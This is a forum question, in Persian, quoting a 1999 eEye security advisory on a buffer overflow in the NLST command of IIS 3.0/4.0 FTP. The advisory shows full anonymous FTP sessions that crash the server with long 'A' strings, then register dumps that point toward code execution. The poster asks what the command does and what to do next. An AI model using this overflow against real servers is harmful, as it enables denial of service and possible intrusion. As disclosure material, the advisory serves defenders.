با سلام کسی می تونه بگه اون command دقیقا چیکار می کنه و بعدش باید چیکار کرد؟
کد PHP:
IIS Remote FTP Exploit/DoS Attack
Systems Affected:
Windows NT 4.0 (SP4) IIS 3.0 / 4.0
Windows 95/98 PWS 1.0
Release Date:
Sunday, January 24, 1999
Advisory Code:
IISE01
De******ion:
While feeding in logic into Retina's artificial intelligence
engine, which helps construct query strings to pass to
internet servers, checking for overflow bugs and miss
parsing of command strings. Our test server stopped
responding. Below is our findings.
Microsoft IIS (Internet Information Server) FTP service
contains a buffer overflow in the NLST command. This could
be used to DoS a remote machine and in some cases
execute code remotely.
Lets look at the following example attack. The server must
either have anonymous access rights or an attacker must
have an account. FTP Session was initiated from an NT
Machine.
C:\>ftp guilt.xyz.com
Connected to guilt.xyz.com.
220 GUILT Microsoft FTP Service (Version
4.0).
User (marc.xyz.com:(none)): ftp
331 Anonymous access allowed, send identity
(e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
200 PORT command successful.
150 Opening ASCII mode data connection for
file list.
[The server has now processed our long NLST request and
has crashed]
-> ftp: get :Connection reset by peer
[Our ftp client looses connection... that
is a given]
The above example uses 316 characters to overflow. This is
the smallest possible buffer to pass that will overflow IIS.
Lets take a look at the server side happenings.
On the server side we have an "Application Error" message
for inetinfo.exe. "The instruction at '0x710f8aa2' referenced
memory at '0x41414156'. The memory could not be 'read'." If
we take a look at our registers we will see the following:
EAX = 0000005C EBX = 00000001
ECX = 00D3F978 EDX = 002582DD
ESI = 00D3F978 EDI = 00000000
EIP = 710F8AA2 ESP = 00D3F644
EBP = 00D3F9F0 EFL = 00000206
There is no 41 hex (Our overflow character) in any of our
registers so we chalk this up as a DoS attack for now.
Lets move on and take a look at the largest string we can
pass to overflow IIS.
C:\>ftp guilt.xyz.com
Connected to guilt.xyz.com.
220 GUILT Microsoft FTP Service (Version
4.0).
User (marc.xyz.com:(none)): ftp
331 Anonymous access allowed, send identity
(e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAA
200 PORT command successful.
150 Opening ASCII mode data connection for
file list.
Connection closed by remote host.
In this case we passed 505 characters to overflow IIS. This
is the largest possible (tested) buffer to pass that will
overflow IIS. Lets take a look once again at the server side.
On the server we have the same "Application Error"
message for inetinfo.exe except this time "The instruction at
'0x722c9262' referenced memory at "0x41414141'." This is
looking mighty interesting. Lets look at our registers once
again:
EAX = 00000000 EBX = 41414141
ECX = 41414141 EDX = 722C1CAC
ESI = 41414141 EDI = 41414141
EIP = 722C9262 ESP = 00D3F524
EBP = 00D3F63C EFL = 00000246
There sure are a lot of 41 hex codes in our registers now.
So to wrap it all up what we have here is a DoS attack
against any IISserver with ftp access. Keep in mind we have
to be able to login. However, Anonymous access is granted
on most servers. Once we have overflowed IIS all IIS
services will fail. (I.E. The web service, NNTP, SMTP etc..)
What we have seems to be a very interesting buffer overflow.
Special Thanks
The eEye Digital Security Team would like to extend a
special thanks to Mudge and Dildog.
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this
alert electronically. It is not to be edited in any way without
express consent of eEye. If you wish to reprint the whole or
any part of this alert in any other medium excluding
electronic medium, please e-mail [email protected] for
permission.
Disclaimer:
The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an
AS IS condition. There are NO warranties with regard to this
information. In no event shall the author be liable for any
damages whatsoever arising out of or in connection with the
use or spread of this information. Any use of this information
is at the user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
http://www.eEye.com
[email protected]
Comment